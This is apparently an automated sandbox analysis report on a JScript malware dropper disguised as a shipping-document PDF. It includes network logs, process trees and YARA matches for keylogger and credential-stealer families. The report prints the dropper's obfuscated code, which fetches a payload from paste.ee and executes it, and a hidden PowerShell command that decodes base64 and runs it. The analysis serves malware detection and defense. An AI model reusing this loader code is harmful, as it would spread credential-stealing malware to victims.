                                                                                                                                  3 | 192.168.2.6 | 49695 | 23.186.113.60 | 443 | 6852 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  2025-04-28 11:24:37 UTC | 70 | OUT | GET /d/xZVSQx4S/0 HTTP/1.1
                                                                                                                                  Host: paste.ee
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2025-04-28 11:24:38 UTC | 952 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                  Date: Mon, 28 Apr 2025 11:24:38 GMT
                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                  Content-Length: 124928
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Cache-Control: max-age=2592000
                                                                                                                                  X-Varnish: 43981049 43611395
                                                                                                                                  Age: 68
                                                                                                                                  Via: 1.1 varnish (Varnish/6.2)
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Strict-Transport-Security: max-age=63072000
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  4 | 192.168.2.6 | 49697 | 104.21.112.1 | 443 | 6720 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  2025-04-28 11:24:40 UTC | 87 | OUT | GET /xml/173.244.56.186 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2025-04-28 11:24:40 UTC | 856 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 28 Apr 2025 11:24:40 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 362
                                                                                                                                  Connection: close
                                                                                                                                  Server: cloudflare
                                                                                                                                  Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Cf-Ray: 937631cf995a720e-PHX
                                                                                                                                  Age: 447750
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  Cf-Cache-Status: HIT
                                                                                                                                  Last-Modified: Wed, 23 Apr 2025 07:02:09 GMT
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ch1kigogmWRsHuySsToIesGmhWRn6Mhz2st93OV2NB%2FaBW3wD7DoGiRCSNsN2bdenTZOIbs5Ra7FkLYAKprVyVSdbU9HnMJ5cHTg84%2F7fW2YdQzoKTFdztPvEKwmEUCFKRUGW6R2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=140012&min_rtt=139821&rtt_var=29789&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=28748&cwnd=252&unsent_bytes=0&cid=b91cc1996b5f6905&ts=353&x=0"
                                                                                                                                  2025-04-28 11:24:40 UTC | 362 | IN | Data Ascii: <Response><IP>173.244.56.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85036</ZipCode><TimeZone>America/Phoenix</TimeZon



                                                                                                                                  Target ID:0
                                                                                                                                  Start time:07:24:06
                                                                                                                                  Start date:28/04/2025
                                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Documents SI 694_pdf.js"
                                                                                                                                  Imagebase:0x7ff695850000
                                                                                                                                  File size:170'496 bytes
                                                                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:10
                                                                                                                                  Start time:07:24:23
                                                                                                                                  Start date:28/04/2025
                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = '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' -replace '','';$allocryptic = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($fronts));Invoke-Expression $allocryptic;"
                                                                                                                                  Imagebase:0x7ff7d5ca0000
                                                                                                                                  File size:452'608 bytes
                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:11
                                                                                                                                  Start time:07:24:23
                                                                                                                                  Start date:28/04/2025
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff68dae0000
                                                                                                                                  File size:862'208 bytes
                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false

                                                                                                                                  Target ID:12
                                                                                                                                  Start time:07:24:37
                                                                                                                                  Start date:28/04/2025
                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                  Imagebase:0x500000
                                                                                                                                  File size:262'432 bytes
                                                                                                                                  MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2507426885.0000000002959000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false

                                                                                                                                  Call Graph

                                                                                                                                  [Call graph figure omitted; its nodes include the script entry point and ActiveXObject().]

                                                                                                                                  Script:

                                                                                                                                  Code
                                                                                                                                  var maidenlike = "MS\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28XML2.S\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28erver\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28XML\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28HTTP".split ( "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28" ).join ( "" );
                                                                                                                                  • "MS\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28XML2.S\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28erver\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28XML\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28HTTP".split("\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28") ➔ MS,XML2.S,erver,XML,HTTP
                                                                                                                                  • MS,XML2.S,erver,XML,HTTP.join("") ➔ "MSXML2.ServerXMLHTTP"
                                                                                                                                  var Shumen = new ActiveXObject ( maidenlike );
                                                                                                                                    var basketcases = "h\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28t\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28t\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28p\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28:\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28/\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28/\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28p\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28a\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28s\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28t\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28e\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28.\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28e\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28e\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28/\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28d\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28/\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28f\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28a\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e287\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28O\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28M\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28k\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e282\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e280\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28/\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e280".split ( "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28" ).join ( "" );
                                                                                                                                    • "h\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28t\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28t\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28p\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28:\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28/\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28/\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28p\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28a\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28s\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28t\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28e\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28.\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28e\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28e\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28/\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28d\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28/\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28f\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28a\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e287\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28O\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28M\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28k\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e282\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e280\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28/\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e280".split("\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28") ➔ h,t,t,p,:,/,/,p,a,s,t,e,.,e,e,/,d,/,f,a,7,O,M,k,2,0,/,0
                                                                                                                                    • h,t,t,p,:,/,/,p,a,s,t,e,.,e,e,/,d,/,f,a,7,O,M,k,2,0,/,0.join("") ➔ "http://paste.ee/d/fa7OMk20/0"
                                                                                                                                    var pyrry = "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28open\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28".split ( "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28" ).join ( "" );
                                                                                                                                    • "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28open\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28".split("\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28") ➔ ,open,
                                                                                                                                    • ,open,.join("") ➔ "open"
                                                                                                                                    var alebench = "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28send\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28".split ( "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28" ).join ( "" );
                                                                                                                                    • "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28send\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28".split("\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28") ➔ ,send,
                                                                                                                                    • ,send,.join("") ➔ "send"
                                                                                                                                    var tentaculicyst = "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28responseText\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28".split ( "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28" ).join ( "" );
                                                                                                                                    • "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28responseText\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28".split("\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28") ➔ ,responseText,
                                                                                                                                    • ,responseText,.join("") ➔ "responseText"
                                                                                                                                    var batholith = "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28Function\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28".split ( "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28" ).join ( "" );
                                                                                                                                    • "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28Function\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28".split("\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28") ➔ ,Function,
                                                                                                                                    • ,Function,.join("") ➔ "Function"
                                                                                                                                    Shumen[pyrry] ( "GET", basketcases, false );
                                                                                                                                    • open("GET","http://paste.ee/d/fa7OMk20/0",false) ➔ undefined
                                                                                                                                    Shumen[alebench] ( );
                                                                                                                                    • send() ➔ undefined
                                                                                                                                    new this[batholith] ( Shumen[tentaculicyst] ) ( );
                                                                                                                                    • () ➔ undefined

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:2.2%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:0%
                                                                                                                                    Total number of Nodes:4
                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                    [Execution graph figure omitted; the graph data names one API node, CreateProcessW.]

                                                                                                                                    Executed Functions

                                                                                                                                    Control-flow Graph

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.1583912769.00007FF88A970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88A970000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_7ff88a970000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 011c0aa564910bd1349248ccfc86826f4be8d02e7be43e585017a4b8d30a50c5
                                                                                                                                    • Instruction ID: dde6d365e4c148c94e2dc9efe4773f5620ddb40597a48d4fc1c577bece7c9a62
                                                                                                                                    • Opcode Fuzzy Hash: 011c0aa564910bd1349248ccfc86826f4be8d02e7be43e585017a4b8d30a50c5
                                                                                                                                    • Instruction Fuzzy Hash: 45222621A0EBC95FE3569A289C592B57BE1FF46260B0841FFD45DC71D3DE18AC06C3A2

                                                                                                                                    Control-flow Graph

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.1583912769.00007FF88A970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88A970000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_7ff88a970000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: r6y$r6y
                                                                                                                                    • API String ID: 0-2250052535
                                                                                                                                    • Opcode ID: 6ede4a1a0ab541f7e50d62f5424ca67728dceb3566b1b98ddd438132a26f572f
                                                                                                                                    • Instruction ID: d9fbc03b0bcbb7c2ceb7a060abf098f13645962975c65800d0de93cd6fba5fba
                                                                                                                                    • Opcode Fuzzy Hash: 6ede4a1a0ab541f7e50d62f5424ca67728dceb3566b1b98ddd438132a26f572f
                                                                                                                                    • Instruction Fuzzy Hash: AB313C32F1DD990FFBA59A5CAC192F9B3D1FFA4690B5801F6C41EC31D5DE18A8128391

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.1583205795.00007FF88A8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88A8A0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_7ff88a8a0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                    • Opcode ID: 04989912e9650e0cfa56c0190a299e7c47df4146a9177ef527353b11c7720c56
                                                                                                                                    • Instruction ID: 40f2b6fe6655448a8f74ba9ab5342afe187fe25b187902a72c43540c92e18627
                                                                                                                                    • Opcode Fuzzy Hash: 04989912e9650e0cfa56c0190a299e7c47df4146a9177ef527353b11c7720c56
                                                                                                                                    • Instruction Fuzzy Hash: AC411A31A08A6D8FDBA4EB18D854BE9B7F0FB59310F0001EAD44DE3291DB75AA81CF41

                                                                                                                                    Control-flow Graph

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.1583912769.00007FF88A970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88A970000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_7ff88a970000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: r6y
                                                                                                                                    • API String ID: 0-3142403458
                                                                                                                                    • Opcode ID: bf589bd9ba46f9c3634f703d9fe17af10b3f365ef3d6bc58de0c096c41885bb9
                                                                                                                                    • Instruction ID: ec9c0918ce39211c29122230bc32987aafea08af00864482a98de06cbb2f1e5e
                                                                                                                                    • Opcode Fuzzy Hash: bf589bd9ba46f9c3634f703d9fe17af10b3f365ef3d6bc58de0c096c41885bb9
                                                                                                                                    • Instruction Fuzzy Hash: 8FF02422F1E9D91BA7A4AA6C7C192F463D1FFA59A0B1C02F6C81DC3186DC085C164381

                                                                                                                                    Control-flow Graph

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.1583912769.00007FF88A970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88A970000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_7ff88a970000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
